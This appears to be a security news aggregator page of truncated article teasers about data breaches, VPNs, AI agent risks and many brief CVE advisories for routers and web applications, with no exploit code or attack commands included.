Read Full Article →

AI pioneer Vishal Sikka warns to never trust an LLM that runs alone interview Don't trust; verify. According to AI researcher Vishal Sikka, LLMs alone are limited by computational boundaries and will start to hallucinate when they push those boundaries. One solution? Companion bots that check the...

Read Full Article →

VPNs, or virtual private networks, are one of the most effective ways to stay safe online. Not only do they allow you to stay anonymous, but they can help safeguard your data and keep intrusive trackers at bay. Plus, they allow you to get around region blocks on streaming services and avoid ISP t...

Read Full Article →

Is an autonomous network of AI agents about to break free from humanity and take over the world? You might think so when you follow the uproar surrounding Moltbook , the latest big buzzword from the tech world. A quick background for those who haven’t been keeping up: The other week Clawbot — a p...

Read Full Article →

Substack has informed some of its users of a data breach in which email addresses and phone numbers were stolen. The attack occurred in October 2025, but the breach was first discovered on February 3rd, 2026, reports BleepingComputer . According to Substack CEO Chris Best, an unauthorized party g...

Read Full Article →

Attackers may have snapped user locations and activity information, message warns Legacy image-sharing website Flickr suffered a data breach, according to customers emails seen by The Register .…

Read Full Article →

UK leaps to sixth in global flood charts as mega-swarm unleashes 31.4 Tbps Yuletide pummeling Cloudflare says DDoS crews ended 2025 by pushing traffic floods to new extremes, while Britain made an unwelcome leap of 36 places to become the world's sixth-most targeted location.…

Read Full Article →

A particularly insidious phishing campaign is disguising malware pretending to be ordinary PDF documents behind links to virtual hard disks. Because workers are used to receiving purchase orders or invoices in the PDF format, they are likely to open the malicious files unthinkingly, enabling the ...

Read Full Article →

Many Windows 10 users are still struggling to take that leap of faith and switch over to Windows 11. The move has long seemed to be one that’s inevitable even if postponed for as long as possible, but data protection experts are now advising that it’s the smart move: don’t switch to Windows 11 an...

Read Full Article →

As someone who has spent 17+ years working hands-on with data analytics and decision intelligence initiatives across multiple industries, I have observed generative AI mature from an intriguing side experiment into a genuinely transformative capability. What began in late 2024 as cautious pilots ...

Read Full Article →

“I want you to build an AI project manager.” It seemed like a simple request at the time; a fun little side project for one of our engineers to knock out in a couple of days between their “real work.” That turned out to be partly right. It was a fun project, but it wasn’t quick. It forced us to r...

Read Full Article →

It was 2022 and I was sitting in a quarterly business review feeling invincible. I was the director of product for a SaaS platform scaling toward $25 million in annual recurring revenue (ARR). My team was a machine. Our Jira hygiene was impeccable. Our velocity was at an all-time high. We were sh...

Read Full Article →

I still remember the feeling of day 1 on a massive post-merger integration project. The command center was packed, coffee cups were overflowing and the air was thick with the silent prayer of every CIO: Please let the data reconcile. We had spent months on the blueprint phase. We had retired 25 l...

Read Full Article →

Five years ago, digital transformation inside large enterprises followed a familiar pattern. Technology initiatives were introduced centrally, often by IT or digital teams, and pushed into operating environments measured on uptime, cost and output. Digital was viewed as organizational infrastruct...

Read Full Article →

Well, that escalated quickly. I’m talking, of course, about OpenClaw (a.k.a. Moltbot a.k.a. Clawdbot), which not only represents a headlong rush into unchecked agentic AI, but also an emerging ecosystem that reads like every dystopian cautionary cyberpunk novel ever written. As my colleague and f...

Read Full Article →

And their toolkit includes a new, Linux kernel rootkit A state-aligned cyber group in Asia compromised government and critical infrastructure organizations across 37 countries in an ongoing espionage campaign, according to security researchers.…

Read Full Article →

Microsoft is apparently integrating System Monitor (Sysmon) directly into Windows 11. This pro-level tool allows you to detect suspicious processes caused by malware or hackers on a Windows PC. Part of the popular Sysinternals suite, it’s free to download directly from Microsoft . Developed by so...

Read Full Article →

Global IT spending will grow 10.8% to reach $6.15 trillion in 2026, Gartner said in its latest forecast, with AI infrastructure accounting for the lion’s share of that growth. The forecast shows a spending spree that shows no signs of slowing down, despite growing chatter about an AI bubble. Ente...

Read Full Article →

It's a threat straight out of sci-fi, and fiendishly hard to detect Sleeper agent-style backdoors in AI large language models pose a straight-out-of-sci-fi security threat.…

Read Full Article →

Windows 11 25H2 has been released, but behind the scenes, Microsoft is constantly working to improve the newest version of Windows. The company frequently rolls out public preview builds to members of its Windows Insider Program, allowing them to test out — and help shape — upcoming features. Ski...

Read Full Article →

When looking for a top-notch VPN, the two most important things to watch out for are privacy and speed. While privacy is crucial to a good VPN, speed shouldn’t be overlooked. Faster speeds mean quicker file downloads and website load times, higher-quality streaming, and just a better all-around e...

Read Full Article →

Apple has embraced agentic AI for developers, introducing direct support in Xcode 26.3 for both Anthropic’s Claude Agent and OpenAI’s Codex and making vibe coding now a platform feature for iPhone, iPad, and Mac. It’s available to all Apple Developer Program members now and will be released “soon...

Read Full Article →

AI systems continued to advance rapidly over the past year, but the methods used to test and manage their risks did not keep pace, according to the International AI Safety Report 2026. The report , produced with inputs from more than 100 experts across over 30 countries, said that pre-deployment ...

Read Full Article →

Towards the end of January, security researchers at Cybernews published a study on AI apps in the Google Play Store. The study revealed that numerous AI apps had inadequate security, leading them to inadvertently leak data from Google’s cloud servers. The result? A whopping total of 730 million T...

Read Full Article →

Updated on February 3rd, 2026: New details have come to light regarding how attackers exploit this vulnerability. We’ve added a section explaining it down below. Microsoft recently published a security advisory warning of a newly discovered zero-day vulnerability in Office applications. The vulne...

Read Full Article →

Linux kernel maintainer honored at Brussels ceremony for decades of critical infrastructure work.

Read Full Article →

Many people’s daily browsing is now done on their mobile devices. So it’s more important than ever to have a great VPN that works well on your phone. While some services work best on Windows, others particularly shine when used on Android devices, and I’ve curated a list of my favorites to help y...

Read Full Article →

Google recently announced in a statement that it has disrupted the “world’s largest residential proxy network.” It was able to remain undetected for a long time, hijacking innocent users’ private devices (including smartphones, PCs, and smart home devices) and using them as gateways for distribut...

Read Full Article →

A VPN, or virtual private network, is one of the best tools you can use to boost your online privacy and security. But in the vast ocean of available services, it can be exhausting trying to find the best VPN for your needs. Thankfully, we here at PCWorld are VPN experts and we’re sharing decades...

Read Full Article →

Security experts at the Computer Security and Industrial Cryptography research group (COSIC) are warning of a serious Bluetooth security vulnerability that could affect millions of headphones, speakers, and other wireless accessories worldwide. If you have any Bluetooth devices, you should check ...

Read Full Article →

Microsoft users are reporting a particularly difficult-to-detect scam: phishing emails sent from a genuine Microsoft email address that’s classified as “trustworthy” by the company itself. The emails appear to be official, but they’re demanding high-value payments and leading victims straight int...

Read Full Article →

Using the antivirus trial that came with your PC? Or perhaps you’ve just been sitting it out with Windows Security? You may be able to do better. Why only may do better? It all depends on your needs—factors like your household, level of tech savvy, and willingness to directly manage your protecti...

Read Full Article →

WinRAR, a tool for unpacking compressed files , is one of those pillars of everyday PC use that’s kind of faded into the background. I used to install it on every computer setup, like VLC and Irfanview. But according to a report from security researchers at Google, a long-known vulnerability in W...

Read Full Article →

Spam and scams generally go hand-in-hand. Accordingly, we all get flooded daily from various angles across multiple email and messaging services, but they’re not the only ways of getting hit. As annoying as they are, scammers are a smart bunch. Which is why my guard is now up after being contacte...

Read Full Article →

Read Full Article →

Currently trending CVE - Hype Score: 24 - SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxProxy deserialization remote code execution vulnerability that, if exploited, would allow an attacker to run commands on the host machine. This vulnerability is a patch bypass ...

Read Full Article → *(Covered by: Intruder Intel CVE Feed)*

A critical vulnerability in Vite

Read Full Article → *(Covered by: Intruder Intel CVE Feed)*

Currently trending CVE - Hype Score: 13 - Livewire is a full-stack framework for Laravel. In Livewire v3 up to and including v3.6.3, a vulnerability allows unauthenticated attackers to achieve remote command execution in specific scenarios. The issue stems from how certain component property upda...

Read Full Article →

Currently trending CVE - Hype Score: 9 - A stack-based buffer overflow vulnerability in NetSupport Manager 14.x versions prior to 14.12.0000 allows a remote, unauthenticated attacker to cause a denial of service (DoS) or potentially leak a limited amount of memory.

Read Full Article → *(Covered by: Intruder Intel CVE Feed)*

Currently trending CVE - Hype Score: 7 - SQL Injection vulnerability in the Structure for Admin authenticated user

Read Full Article →

Currently trending CVE - Hype Score: 1 - A security issue was discovered in ingress-nginx where the `nginx.ingress.kubernetes.io/auth-proxy-set-headers` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx...

Read Full Article →

A vulnerability categorized as critical has been discovered in HGiga C&Cm@il package olln-base up to 7.0-977 . This affects an unknown function. Executing a manipulation can lead to sql injection. This vulnerability appears as CVE-2026-2236 . The attack may be performed from remote. There is no a...

Read Full Article → *(Covered by: VulnDB)*

A vulnerability was found in Oki Electric Industry/Ricoh Company/Murata Machinery Device . It has been classified as problematic . Impacted is an unknown function of the component Windows Service . This manipulation causes unquoted search path. This vulnerability is registered as CVE-2026-24466 ....

Read Full Article →

A vulnerability was found in GIGABYTE MacroHub up to 2.3.1 and classified as critical . This issue affects some unknown processing. The manipulation results in execution with unnecessary privileges. This vulnerability is cataloged as CVE-2026-0870 . The attack must be initiated from a local posit...

Read Full Article →

A vulnerability has been found in GitLab AI Gateway up to 18.6.1/18.7.0/18.8.0 and classified as critical . This vulnerability affects unknown code of the component Duo Workflow Service . The manipulation leads to improper neutralization of special elements used in a template engine. This vulnera...

Read Full Article →

A vulnerability, which was classified as critical , was found in Apache Shiro up to 2.0.6 . This affects an unknown part. Executing a manipulation can lead to authorization bypass. This vulnerability is tracked as CVE-2026-23903 . The attack can be launched remotely. No exploit exists. You should...

Read Full Article →

A vulnerability, which was classified as problematic , has been found in Apache Shiro up to 2.0.6 . Affected by this issue is some unknown functionality. Performing a manipulation results in observable timing discrepancy. This vulnerability is identified as CVE-2026-23901 . The attack can be init...

Read Full Article →

A vulnerability classified as critical was found in jsonpath . Affected by this vulnerability is an unknown functionality. Such manipulation leads to code injection. This vulnerability is referenced as CVE-2026-1615 . It is possible to launch the attack remotely. No exploit is available.

Read Full Article →

A vulnerability classified as critical has been found in Eaton Network M3 up to 2.3.2 . Affected is an unknown function of the component Firmware Upgrade Handler . This manipulation causes improper certificate validation. The identification of this vulnerability is CVE-2026-22613 . It is possible...

Read Full Article →

A **cross-site request

Read Full Article → *(Covered by: VulnDB)*

A vulnerability marked as problematic has been reported in Yokogawa Electric FAST TOOLS up to R10.04 . This affects an unknown function. The manipulation leads to exposure of sensitive system information to an unauthorized control sphere. This vulnerability is uniquely identified as CVE-2025-6659...

Read Full Article →

A vulnerability categorized as problematic has been discovered in Yokogawa Electric FAST TOOLS up to R10.04 . Impacted is an unknown function. Such manipulation leads to security check for standard. This vulnerability is traded as CVE-2025-66607 . The attack may be launched remotely. There is no ...

Read Full Article → *(Covered by: VulnDB)*

A vulnerability was found in Yokogawa Electric FAST TOOLS up to R10.04 and classified as problematic . Affected by this issue is some unknown functionality. Executing a manipulation can lead to exposure of private personal information to an unauthorized actor. This vulnerability is registered as ...

Read Full Article → *(Covered by: VulnDB)*

Read Full Article →

A vulnerability marked as critical has been reported in D-Link DCS-931L up to 1.13.0 . Impacted is the function doSystem of the file /setSystemAdmin . Performing a manipulation of the argument AdminID results in command injection. This vulnerability only affects products that are no longer suppor...

Read Full Article → *(Covered by: VulnDB)*

A vulnerability labeled as critical has been found in DouPHP up to 1.9 . This issue affects some unknown processing of the file /admin/file.php of the component ZIP File Handler . Such manipulation of the argument sql_filename leads to unrestricted upload. This vulnerability is uniquely identifie...

Read Full Article →

A vulnerability identified as critical has been detected in itsourcecode News Portal Project 1.0 . This vulnerability affects unknown code of the file /admin/index.php of the component Administrator Login . This manipulation of the argument email causes sql injection. This vulnerability is handle...

Read Full Article →

A vulnerability categorized as problematic has been discovered in code-projects Online Reviewer System 1.0 . This affects an unknown part of the file /system/system/admins/manage/users/btn_functions.php . The manipulation of the argument firstname results in cross site scripting. This vulnerabili...

Read Full Article → *(Covered by: VulnDB)*

A critical SQL injection vulnerability

Read Full Article → *(Covered by: VulnDB)*

On January 29, 2026, the FCC issued public notice DA 26-96: PUBLIC SAFETY AND HOMELAND SECURITY BUREAU HIGHLIGHTS BEST PRACTICES FOR DEFENDING AGAINST RANSOMWARE ATTACKS By this Public Notice, the Public Safety and Homeland Security Bureau (Bureau) of the Federal Communications Commission (Commis...

Read Full Article →

A vulnerability, which was classified as critical , was found in itsourcecode Event Management System 1.0 . The impacted element is an unknown function of the file /admin/manage_user.php . The manipulation of the argument ID results in sql injection. This vulnerability is cataloged as CVE-2026-22...

Read Full Article → *(Covered by: VulnDB)*

Mathew J. Schwartz reports: The Clop digital extortion gang for years perfected a method for wringing tens of millions out of cybercrime. Find a zero-day flaw, often in file transfer software, swarm vulnerable networks and post online the sensitive data of any victim unwilling to pay for a promis...

Read Full Article →

A vulnerability, which was classified as problematic , has been found in wasm3 up to 0.5.0 . The affected element is the function NewCodePage . The manipulation leads to memory leak. This vulnerability is listed as CVE-2025-15572 . The attack must be carried out locally. In addition, an exploit i...

Read Full Article →

A vulnerability classified as critical was found in rachelos WeRSS we-mp-rss up to 1.4.8 . Impacted is the function download_export_file of the file apis/tools.py . Executing a manipulation of the argument filename can lead to path traversal. This vulnerability is tracked as CVE-2026-2216 . The a...

Read Full Article →

A vulnerability classified as problematic has been found in rachelos WeRSS we-mp-rss up to 1.4.8 . This issue affects some unknown processing of the file core/auth.py of the component JWT Handler . Performing a manipulation of the argument SECRET_KEY results in use of default cryptographic key. T...

Read Full Article →

A vulnerability described as problematic has been identified in ckolivas lrzip up to 0.651 . This vulnerability affects the function ucompthread of the file stream.c . Such manipulation leads to null pointer dereference. This vulnerability is referenced as CVE-2025-15571 . The attack can only be ...

Read Full Article →

A vulnerability marked as problematic has been reported in code-projects for Plugin 1.0 . This affects an unknown part of the file /Administrator/PHP/AdminAddAlbum.php . This manipulation of the argument txtalbum causes cross site scripting. The identification of this vulnerability is CVE-2026-22...

Read Full Article →

A vulnerability labeled as critical has been found in code-projects Online Music Site 1.0 . Affected by this issue is some unknown functionality of the file /Administrator/PHP/AdminAddAlbum.php . The manipulation of the argument txtimage results in unrestricted upload. This vulnerability was name...

Read Full Article →

A vulnerability was found in ckolivas lrzip up to 0.651 . It has been rated as critical . This impacts the function lzma_decompress_buf of the file stream.c . Performing a manipulation results in use after free. This vulnerability is known as CVE-2025-15570 . Attacking locally is a requirement. F...

Read Full Article →

A vulnerability was found in D-Link DIR-823X 250416 . It has been declared as critical . This affects the function sub_4211C8 of the file /goform/set_filtering . Such manipulation leads to os command injection. This vulnerability is traded as CVE-2026-2210 . The attack may be launched remotely. F...

Read Full Article →

A vulnerability was found in Artifex MuPDF up to 1.26.1 on Windows. It has been classified as problematic . The impacted element is the function get_system_dpi of the file platform/x11/win_main.c . This manipulation causes uncontrolled search path. This vulnerability appears as CVE-2025-15569 . T...

Read Full Article →

APA reports: Personal data of employees of the Dutch Data Protection Authority (Autoriteit Persoonsgegevens, AP) and the Council for Justice was accessed by unauthorized persons as a result of a leak caused by a vulnerability in software used by government agencies, APA reports citing ANP news ag...

Read Full Article →

A vulnerability was found in WeKan up to 8.18 and classified as critical . The affected element is the function setCreateTranslation of the file client/components/settings/translationBody.js of the component Custom Translation Handler . The manipulation results in improper authorization. This vul...

Read Full Article →

A vulnerability has been found in WeKan up to 8.20 and classified as problematic . Impacted is an unknown function of the file server/publications/rules.js of the component Rules Handler . The manipulation leads to missing authorization. This vulnerability is documented as CVE-2026-2208 . The att...

Read Full Article →

A vulnerability, which was classified as problematic , was found in WeKan up to 8.20 . This issue affects some unknown processing of the file server/publications/activities.js of the component Activity Publication Handler . Executing a manipulation can lead to information disclosure. This vulnera...

Read Full Article →

A vulnerability, which was classified as critical , has been found in WeKan up to 8.20 . This vulnerability affects unknown code of the file server/methods/fixDuplicateLists.js of the component Administrative Repair Handler . Performing a manipulation results in improper access controls. This vul...

Read Full Article →

A vulnerability classified as problematic was found in WeKan up to 8.20 . This affects an unknown part of the file server/publications/cards.js of the component Meteor Publication Handler . Such manipulation leads to information disclosure. This vulnerability is listed as CVE-2026-2205 . The atta...

Read Full Article →

A vulnerability classified as problematic has been found in WeKan up to 8.18 . Affected by this issue is some unknown functionality of the file server/publications/attachments.js of the component Attachment Metadata Handler . This manipulation causes information exposure through discrepancy. This...

Read Full Article → *(Covered by: VulnDB)*

A vulnerability described as problematic has been identified in WeKan up to 8.18 . Affected by this vulnerability is an unknown functionality of the file models/cardComments.js of the component Card Comment Creation API . The manipulation results in authorization bypass. This vulnerability is ide...

Read Full Article → *(Covered by: VulnDB)*

A vulnerability labeled as critical has been found in WeKan up to 8.18 . This impacts an unknown function of the component Update API . Executing a manipulation can lead to incorrect authorization. The identification of this vulnerability is CVE-2026-25565 . The attack may be launched remotely. T...

Read Full Article → *(Covered by: VulnDB)*

A vulnerability identified as problematic has been detected in WeKan up to 8.18 . This affects an unknown function of the file models/checklists.js of the component Checklist Handler . Performing a manipulation results in authorization bypass. This vulnerability was named CVE-2026-25564 . The att...

Read Full Article →

A vulnerability was found in WeKan up to 8.18 . It has been declared as critical . Impacted is an unknown function of the file packages/wekan-ldap/server/ldap.js . The manipulation results in ldap injection. This vulnerability is known as CVE-2026-25560 . It is possible to launch the attack remot...

Read Full Article →

A vulnerability has been found in macrozheng mall up to 1.0.3 and classified as critical . This affects an unknown part. Performing a manipulation results in weak password recovery. This vulnerability is reported as CVE-2026-25858 . The attack is possible to be carried out remotely. No exploit ex...

Read Full Article →

A vulnerability, which was classified as critical , was found in Tenda G300-F up to 16.01.14.2 . Affected by this issue is the function formSetWanDiag of the component Management Interface . Such manipulation leads to os command injection. This vulnerability is documented as CVE-2026-25857 . The ...

Read Full Article →

A vulnerability, which was classified as critical , has been found in Tenda AC8 16.03.33.05 . Affected by this vulnerability is an unknown functionality of the file /goform/fast_setting_wifi_set of the component Embedded Httpd Service . This manipulation of the argument timeZone causes buffer ove...

Read Full Article →

A vulnerability classified as critical was found in Tenda AC8 16.03.33.05 . Affected is the function fromSetWifiGusetBasic of the file /goform/WifiGuestSet of the component httpd . The manipulation of the argument shareSpeed results in buffer overflow. This vulnerability is cataloged as CVE-2026-...

Read Full Article →

A vulnerability classified as problematic has been found in ZeroWdd studentmanager up to 2151560fc0a50ec00426785ec1e01a3763b380d9 . This impacts the function addLeave of the file src/main/java/com/wdd/studentmanager/controller/LeaveController.java . The manipulation of the argument Reason for Lea...

Read Full Article →

A vulnerability described as problematic has been identified in heyewei JFinalCMS 5.0.0 . This affects an unknown function of the file /admin/admin/save of the component API Endpoint . Executing a manipulation can lead to cross site scripting. This vulnerability is tracked as CVE-2026-2200 . The ...

Read Full Article →

A vulnerability was found in D-Link DI-7100G C1 24.04.18D1 . It has been declared as critical . This affects the function start_proxy_client_email . Executing a manipulation can lead to command injection. This vulnerability is handled as CVE-2026-2194 . The attack can be executed remotely. Additi...

Read Full Article → *(Covered by: VulnDB)*

A vulnerability was found in Tenda AC9 15.03.06.42_multi and classified as critical . Affected by this vulnerability is the function formGetRebootTimer . Such manipulation of the argument sys.schedulereboot.start_time/sys.schedulereboot.end_time leads to stack-based buffer overflow. This vulnerab...

Read Full Article →

A vulnerability has been found in Tenda AC9 15.03.06.42_multi and classified as critical . Affected is the function formGetDdosDefenceList . This manipulation of the argument security.ddos.map causes stack-based buffer overflow. This vulnerability appears as CVE-2026-2191 . The attack may be init...

Read Full Article →

A vulnerability, which was classified as critical , has been found in itsourcecode School Management System 1.0 . This affects an unknown function of the file /ramonsys/report/index.php . The manipulation of the argument ay leads to sql injection. This vulnerability is documented as CVE-2026-2189...

Read Full Article →

A vulnerability classified as critical was found in UTT 进取 521G 3.1.1-190816 . The impacted element is the function sub_446B18 of the file /goform/formPdbUpConfig . Executing a manipulation of the argument policyNames can lead to os command injection. This vulnerability is registered as CVE-2026-...

Read Full Article →

A vulnerability classified as critical has been found in Tenda RX3 16.03.13.11 . The affected element is the function set_qosMib_list of the file /goform/formSetQosBand . Performing a manipulation of the argument list results in stack-based buffer overflow. This vulnerability is cataloged as CVE-...

Read Full Article → *(Covered by: VulnDB)*

A vulnerability marked as critical has been reported in Tenda RX3 16.03.13.11 . This issue affects the function set_device_name of the file /goform/setBlackRule of the component MAC Filtering Configuration Endpoint . This manipulation of the argument devName/mac causes stack-based buffer overflow...

Read Full Article →

A vulnerability labeled as critical has been found in Great Developers Certificate Generation System up to 97171bb0e5e22e52eacf4e4fa81773e5f3cffb73 . This vulnerability affects unknown code of the file /restructured/csv.php . The manipulation of the argument photo results in os command injection....

Read Full Article → *(Covered by: VulnDB)*

A vulnerability categorized as critical has been discovered in UTT 进取 521G 3.1.1-190816 . Affected by this issue is the function doSystem of the file /goform/setSysAdm . Executing a manipulation of the argument passwd1 can lead to command injection. The identification of this vulnerability is CVE...

Read Full Article →

A vulnerability was found in Tenda RX3 16.03.13.11 . It has been rated as critical . Affected by this vulnerability is an unknown functionality of the file /goform/openSchedWifi . Performing a manipulation of the argument schedStartTime/schedEndTime results in stack-based buffer overflow. This vu...

Read Full Article →

A vulnerability was found in Tenda RX3 16.03.13.11 . It has been declared as critical . Affected is an unknown function of the file /goform/fast_setting_wifi_set . Such manipulation of the argument ssid_5g leads to stack-based buffer overflow. This vulnerability is uniquely identified as CVE-2026...

Read Full Article →

A vulnerability was found in PHPGurukul Hospital Management System 4.0 . It has been classified as critical . This impacts an unknown function of the file /admin/manage-users.php . This manipulation of the argument ID causes sql injection. This vulnerability is handled as CVE-2026-2179 . The atta...

Read Full Article →

A vulnerability was found in r-huijts xcode-mcp-server up to f3419f00117aa9949e326f78cc940166c88f18cb and classified as critical . This affects the function registerXcodeTools of the file src/tools/xcode/index.ts of the component run_lldb . The manipulation of the argument args results in command...

Read Full Article →

A vulnerability has been found in SourceCodester Prison Management System 1.0 and classified as critical . The impacted element is an unknown function of the component Login . The manipulation leads to session fixiation. This vulnerability is traded as CVE-2026-2177 . It is possible to initiate t...

Read Full Article →

A vulnerability, which was classified as critical , was found in JAY Login & Register Plugin up to 2.6.03 on WordPress. The affected element is the function jay_panel_ajax_update_profile . Executing a manipulation can lead to improper privilege management. This vulnerability appears as CVE-2025-1...

Read Full Article → *(Covered by: VulnDB)*

A vulnerability classified as critical was found in code-projects Contact Management System 1.0 . This issue affects some unknown processing of the file index.py . Such manipulation of the argument selecteditem[0] leads to sql injection. This vulnerability is documented as CVE-2026-2176 . The att...

Read Full Article →

A vulnerability classified as critical has been found in D-Link DIR-823X 250416 . This vulnerability affects the function sub_420618 of the file /goform/set_upnp . This manipulation of the argument upnp_enable causes os command injection. This vulnerability is registered as CVE-2026-2175 . Remote...

Read Full Article →

A vulnerability described as critical has been identified in code-projects Contact Management System 1.0 . This affects an unknown part of the component CRUD Endpoint . The manipulation of the argument ID results in improper authentication. This vulnerability is cataloged as CVE-2026-2174 . The a...

Read Full Article →

A vulnerability marked as critical has been reported in code-projects Online Examination System 1.0 . Affected by this issue is some unknown functionality of the file login.php . The manipulation of the argument username/password leads to sql injection. This vulnerability is listed as CVE-2026-21...

Read Full Article → *(Covered by: VulnDB)*

A vulnerability labeled as critical has been found in code-projects Online Application System for Admission 1.0 . Affected by this vulnerability is an unknown functionality of the file enrollment/index.php of the component Login Endpoint . Executing a manipulation can lead to sql injection. This ...

Read Full Article →

Harvey Kong reports: Hong Kong’s privacy watchdog plans to consult lawmakers this year about introducing mandatory data breach reporting and related penalties, the body’s chief has said. Privacy Commissioner for Personal Data Ada Chung Lai-ling on Saturday revealed details about the proposed legi...

Read Full Article →

A vulnerability categorized as critical has been discovered in D-Link DWR-M921 1.1.50 . This impacts an unknown function of the file /boafrm/formLtefotaUpgradeFibocom . Such manipulation of the argument fota_url leads to command injection. This vulnerability is referenced as CVE-2026-2169 . It is...

Read Full Article → *(Covered by: VulnDB)*

In October 2025, the publishing platform Substack suffered a data breach that was subsequently circulated more widely in February 2026. The breach exposed 663k account holder records containing email addresses along with publicly visible profile information from Substack accounts, such as publica...

Read Full Article →

Government advisories have informed entities and the public that paying ransomware gangs to get a decryptor key is no guarantee that you will get the decryptor key, or even if you get one, that none of the files will have been corrupted. Here’s a more striking reason not to consider paying for a ...

Read Full Article →

This Apple Pay phishing campaign is designed to funnel victims into fake Apple Support calls, where scammers steal payment details.

Read Full Article →

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 6, 2026 –Listen to the podcast On Jun. 25, 2012, 31-year-old Higinio O. Ochoa, III of Dallas, Texas, the self-proclaimed associate of computer hacker groups known as “Anonymous” and “CabinCr3w” pleaded gui...

Read Full Article →

SASE vs. SSE explained: Understand the key differences between Secure Access Service Edge (SASE) and Security Service Edge (SSE) , including when each model makes the most sense for modern, cloud-first organizations. How SSE can be your path to SASE: Learn why many enterprises start with SSE as a...

Read Full Article →

He promised "the best security there is" to hundreds of thousands of drug buyers, while quietly making the kind of mistake that guaranteed a 30-year sentence. And maybe training police on cryptocurrency while running a running a vast Tor-hidden drug bazaar wasn't such a good idea. Read more in my...

Read Full Article → *(Covered by: Bitdefender Hot For Security, Graham Cluley)*

Chad van Alstin reports: The U.S. Department of Health and Human Services Office of the Inspector General (OIG) released a report focused on a “large Southeastern hospital” that the agency said had security vulnerabilities that could be vectors for a cyberattack. The unnamed hospital, according t...

Read Full Article →

This week, Joe cautions the rush to adopt AI tools rife with truly awful security vulnerabilities.

Read Full Article →

Nitrogen ransomware’s ESXi encryptor corrupts its own public key, making file recovery impossible even if victims pay.

Read Full Article →

When Rapid7 published its analysis of the Chrysalis backdoor linked to a compromise of Notepad++ update infrastructure, it raised understandable questions from customers and security teams. The investigation showed that attackers did not exploit a flaw in the application itself. Instead, they com...

Read Full Article →

From school districts to state agencies, 2025 cyber incidents were a wake-up call about asset visibility. Discover five actionable lessons SLG leaders can use to close the cyber exposure gap and move from reactive threat detection and response to proactive exposure management. Key takeaways Effec...

Read Full Article →

The DEAD#VAX campaign tricks users into installing AsyncRAT by disguising a virtual hard disk as a PDF attachment.

Read Full Article →

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 5, 2026 –Read the full story in CSO Lack of access to executives and the board is a red flag and a top reason why chief information security officers decide to leave The post CISO FAQ: Should I Stay Or Sho...

Read Full Article →

Cisco Talos uncovered “DKnife,” a fully featured gateway-monitoring and adversary-in-the-middle (AitM) framework comprising seven Linux-based implants.

Read Full Article →

For a few days, many phishing emails that landed into my mailbox contain strange URLs. They are classic emails asking you to open a document, verify your pending emails, …

Read Full Article →

In January 2026, the automated investment platform Betterment confirmed it had suffered a data breach attributed to a social engineering attack . As part of the incident, Betterment customers received fraudulent crypto-related messages promising high returns if funds were sent to an attacker-cont...

Read Full Article →

Key Takeaways The Question CISOs Cannot Answer Today The scan is done. Dashboards are full. Change windows are tight. And one critical question dominates every vulnerability review: “Is this exposure actually exploitable on our asset, in our production environment,with our controls, right now?” V...

Read Full Article →

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 4, 2026 –Read the full story Cybersecurity Ventures publishes a chart at RansomwareCost.com containing our calculations of global ransomware damage cost predictions from 2015 to 2031. For this year, 2026, ...

Read Full Article →

Mozilla and other companies are starting to see why giving users a choice over AI features matters.

Read Full Article →

Tenable Research discovered two novel vulnerabilities in Google Looker that could allow an attacker to completely compromise a Looker instance. Google moved swiftly to patch these issues. Organizations running Looker on-prem should verify they have upgraded to the patched versions. Key takeaways ...

Read Full Article →

FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution

Read Full Article → *(Covered by: CXSecurity Exploit Database, ExploitDB)*

Rublevka Team exemplifies the industrialization of crypto scams. Learn how traffer teams and wallet drainers enable high-volume theft.

Read Full Article →

Moltbot, the viral AI agent, offers immense power but is riddled with critical vulnerabilities, including remote code execution (RCE), exposed control interfaces, and malicious extensions. Read on to understand the vulnerabilities associated with Moltbot and the immediate security practices users...

Read Full Article →

The January 2026 edition of LevelBlue SpiderLabs ransomware tracker noted a sharp fall in the number of attacks launched compared to December 2025. Qilin remained the top attacker, but there was a reshuffling of the remaining top five attackers for the month.

Read Full Article →

Threat actors compromised the update infrastructure for Notepad++, redirecting traffic to an attacker controlled site for targeted espionage purposes. Change log Update February 4: This FAQ blog has been updated to note that CVE-2025-15556 was assigned for this security incident. Click here to re...

Read Full Article →

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 3, 2026 –Read the full story from BreachLock Everything you always wanted to know about penetration testing but were afraid to ask can be found in a widely popular blog post from BreachLock, a The post Wha...

Read Full Article →

As leaked datasets are merged and enriched, they become more useful to criminals. That makes recycled breach data a bigger risk for customers.

Read Full Article →

We followed a fake cloud storage payment alert through deceptive affiliate redirects, ending at a familiar destination: Freecash.

Read Full Article →

Introduction On January 26, 2026, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2018-14634 to its Known Exploited Vulnerabilities (KEV) catalog. The same vulnerability was discovered by the Qualys Threat Research Unit (TRU) in September 2018. We nicknamed it “Mutagen Astro...

Read Full Article →

Browser Guard still blocks scams and phishing like it always has. But we had to rebuild the way it does that from the ground up.

Read Full Article →

Empower CISOs with actionable cybersecurity resources including maturity assessments, incident response playbooks, and vendor risk tools. Strengthen security programs using Security Colony , a self-service cybersecurity knowledge platform built by LevelBlue and SpiderLabs experts. Improve cyber r...

Read Full Article →

Rapid7 Labs, together with the Rapid7 MDR team, has uncovered a sophisticated campaign attributed to the Chinese APT group Lotus Blossom. Active since 2009, the group is known for its targeted espionage campaigns primarily impacting organizations across Southeast Asia and more recently Central Am...

Read Full Article →

Tenable Cloud Security continues to expand the technical depth of our Tenable One exposure management platform. Our latest enhancements include unified multi-cloud exploration, high-fidelity network validation, and expanded entitlement visibility across infrastructure and identity providers. Key ...

Read Full Article →

This week in cybersecurity from the editors at Cybercrime Magazine Sausalito, Calif. – Feb. 2, 2026 –Read the full story in Moneywise Cybercrime will cost the world more than $12 trillion annually by 2031, according to Cybersecurity Ventures, and most of that money will never The post U.S. Secret...

Read Full Article →

Malwarebytes' ChatGPT integration makes it the first cybersecurity provider that can deliver its expertise without ever leaving the chat

Read Full Article →

A list of topics we covered in the week of January 26 to February 1 of 2026

Read Full Article →

RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)

Read Full Article → *(Covered by: CXSecurity Exploit Database, ExploitDB)*
